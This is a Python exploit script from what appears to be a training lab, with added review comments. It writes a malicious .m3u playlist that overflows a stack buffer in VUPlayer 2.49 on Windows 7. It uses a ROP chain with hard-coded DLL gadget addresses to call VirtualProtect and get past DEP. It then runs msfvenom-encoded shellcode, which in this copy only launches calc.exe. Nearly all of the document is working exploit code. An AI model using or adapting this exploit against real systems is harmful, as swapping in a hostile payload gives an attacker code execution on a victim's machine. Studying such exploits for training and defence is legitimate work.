VUPlayer 2.49 stack Buffer Overflow (DEP bypass)

#!/usr/bin/python

# https://www.exploit-db.com/exploits/40018
# VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow (DEP Bypass) 
#
# 
#


import struct


# 0x10015fe8  RETN    ** [BASS.dll] **
# Plain RETN gadget that overwrites the saved return address (it is placed
# right after the 1005-byte filler below). All it does is pop the next dword
# off the stack, so execution flows straight into the ROP chain appended
# behind it. The address is hard-coded, so this only holds if BASS.dll is
# loaded at this base (presumably the module is not ASLR-enabled -- verify).
RET = struct.pack('<L',0x10015fe8)



# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a" -f c -a x86
#Payload size: 220 bytes
# Encoded proof-of-concept payload (launches calc.exe). "-b" told msfvenom to
# avoid the three bytes the .m3u parser cannot carry (0x00, 0x0a, 0x1a); see
# the badchar line printed below. Opaque, encoder-produced bytes: do not edit
# by hand. The decoder stub writes to itself, which is why the ROP chain has
# to make this region executable (VirtualProtect) before it runs.
shellcode = (
"\xbb\xfe\xd1\xa0\xdb\xdb\xca\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x31\x31\x5d\x13\x83\xc5\x04\x03\x5d\xf1\x33\x55\x27\xe5\x36"
"\x96\xd8\xf5\x56\x1e\x3d\xc4\x56\x44\x35\x76\x67\x0e\x1b\x7a"
"\x0c\x42\x88\x09\x60\x4b\xbf\xba\xcf\xad\x8e\x3b\x63\x8d\x91"
"\xbf\x7e\xc2\x71\xfe\xb0\x17\x73\xc7\xad\xda\x21\x90\xba\x49"
"\xd6\x95\xf7\x51\x5d\xe5\x16\xd2\x82\xbd\x19\xf3\x14\xb6\x43"
"\xd3\x97\x1b\xf8\x5a\x80\x78\xc5\x15\x3b\x4a\xb1\xa7\xed\x83"
"\x3a\x0b\xd0\x2c\xc9\x55\x14\x8a\x32\x20\x6c\xe9\xcf\x33\xab"
"\x90\x0b\xb1\x28\x32\xdf\x61\x95\xc3\x0c\xf7\x5e\xcf\xf9\x73"
"\x38\xd3\xfc\x50\x32\xef\x75\x57\x95\x66\xcd\x7c\x31\x23\x95"
"\x1d\x60\x89\x78\x21\x72\x72\x24\x87\xf8\x9e\x31\xba\xa2\xf4"
"\xc4\x48\xd9\xba\xc7\x52\xe2\xea\xaf\x63\x69\x65\xb7\x7b\xb8"
"\xc2\x47\x36\xe1\x62\xc0\x9f\x73\x37\x8d\x1f\xae\x7b\xa8\xa3"
"\x5b\x03\x4f\xbb\x29\x06\x0b\x7b\xc1\x7a\x04\xee\xe5\x29\x25"
"\x3b\x86\xac\xb5\xa7\x67\x4b\x3e\x4d\x78")


# 0x10010157 :  # POP EBP # RETN    ** [BASS.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
# 0x10014db4 :  # NEG EAX # RETN    ** [BASS.dll] **   |   {PAGE_EXECUTE_READWRITE}
# 0x10015fe7 :  # POP EAX # RETN    ** [BASS.dll] **   |   {PAGE_EXECUTE_READWRITE}
# 0x10032f32 :  # XCHG EAX,EBX # RETN 0x00    ** [BASS.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
# 0x10038a6c :  # XCHG EAX,EDX # RETN    ** [BASS.dll] **   |   {PAGE_EXECUTE_READWRITE}
# 0x10101012 :  # POP ECX # RETN    ** [BASSWMA.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
# 0x10016218 :  # POP EDI # RETN    ** [BASS.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
# 0x10604154 :  # POP ESI # RETN    ** [BASSMIDI.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
# 0x1001d7a5 :  # PUSHAD # RETN    ** [BASS.dll] **   |   {PAGE_EXECUTE_READWRITE}
def create_rop_chain():
    """Return the packed ROP chain that turns DEP off for the stack region.

    Generated with mona.py (corelan) using its PUSHAD technique: the gadgets
    load one VirtualProtect() argument into each register (see the per-gadget
    comments), then PUSHAD writes all eight registers to the stack at once so
    they form the call frame, and the EDI/ESI gadgets route execution into
    VirtualProtect through its IAT slot in BASSMIDI.dll. Once the page is
    executable the final 'jmp esp' lands in the NOP slide and shellcode that
    the caller appends after this chain.

    Every address is a fixed offset into BASS.dll / BASSWMA.dll / BASSMIDI.dll,
    so the chain is only valid when those modules load at the bases shown
    (presumably they are not ASLR-enabled -- verify); randomising them is the
    mitigation that breaks it.

    Returns:
        str: the gadget list packed as little-endian dwords. Uses Python 2
        str semantics -- on Python 3 struct.pack yields bytes and the join
        raises TypeError.
    """
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
	  0x10010157,  # POP EBP # RETN
	  0x10010157,  # popped into EBP: the POP EBP # RETN gadget itself (skipped over after the call)
	  0x10015fe7,  # POP EAX # RETN
	  0xfffffdff,  # value to negate: becomes 0x00000201 (dwSize, 513 bytes)
	  0x10014db4,  # NEG EAX # RETN
	  0x10032f32,  # XCHG EAX,EBX # RETN 0x00   -> EBX = dwSize
	  0x10015fe7,  # POP EAX # RETN
	  0xffffffc0,  # value to negate: becomes 0x00000040 (PAGE_EXECUTE_READWRITE)
	  0x10014db4,  # NEG EAX # RETN
	  0x10038a6c,  # XCHG EAX,EDX # RETN       -> EDX = flNewProtect
	  0x10101012,  # POP ECX # RETN
	  0x101082db,  # writable location popped into ECX (&Writable location [BASSWMA.dll]) -> lpflOldProtect
	  0x10016218,  # POP EDI # RETN
	  0x1001dc05,  # RETN (ROP NOP) [BASS.dll] - stored in EDI, first thing executed after PUSHAD
	  0x10604154,  # POP ESI # RETN [BASSMIDI.dll]
	  0x10101c02,  # JMP [EAX] [BASSWMA.dll] - stored in ESI, dereferences EAX to reach VirtualProtect
	  0x10015fe7,  # POP EAX # RETN
	  0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
	  0x1001d7a5,  # PUSHAD # RETN               -> lays the register values out as the call frame
	  0x10022aa7,  # ptr to 'jmp esp' [BASS.dll] -> return address for VirtualProtect: hands control to ESP
    ]
    # '<I' packs each gadget as an unsigned little-endian dword.
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()


print("\n\n[+] eCXD class lab - Windows Basic Stack Overflow")
print("[+] VUPlayer 2.49 stack Buffer Overflow (DEP bypass)  --   test on Win7 SP1 32 bit ENG")
print("[+] Chako\n\n\n")


print("[-] crafting payload...\n")
print("[-] badchar: 0x00, 0x0a, 0x1a \n")


# Layout of the single playlist entry written to exploit.m3u:
#   "http://" + 1005 filler bytes  -> reaches the saved return address
#   RET                            -> RETN gadget, falls through into the chain
#   rop_chain                      -> VirtualProtect() DEP bypass (create_rop_chain)
#   16 x 0x90                      -> NOP slide in front of the shellcode
#   shellcode                      -> encoded payload
#   0xCC padding                   -> int3 filler up to 2000 bytes in total
# NOTE(review): `file` and `buffer` shadow Python 2 builtins. The str + RET
# concatenation and the join in create_rop_chain rely on Python 2 str
# semantics, so despite the print() calls this script is Python 2 only.
# NOTE(review): if len(buffer) ever exceeds 2000 the padding multiplier goes
# negative and silently yields "" instead of failing; the total-length
# assumption is not checked anywhere.
file = open("exploit.m3u", "w")
buffer = "http://" + "\x41" * 1005
buffer += RET
buffer += rop_chain
buffer += "\x90" * 16
buffer += shellcode
buffer += "\xcc" *(2000-len(buffer))


# Not wrapped in a `with` block; the explicit close() is the only flush.
file.write(buffer)
file.close()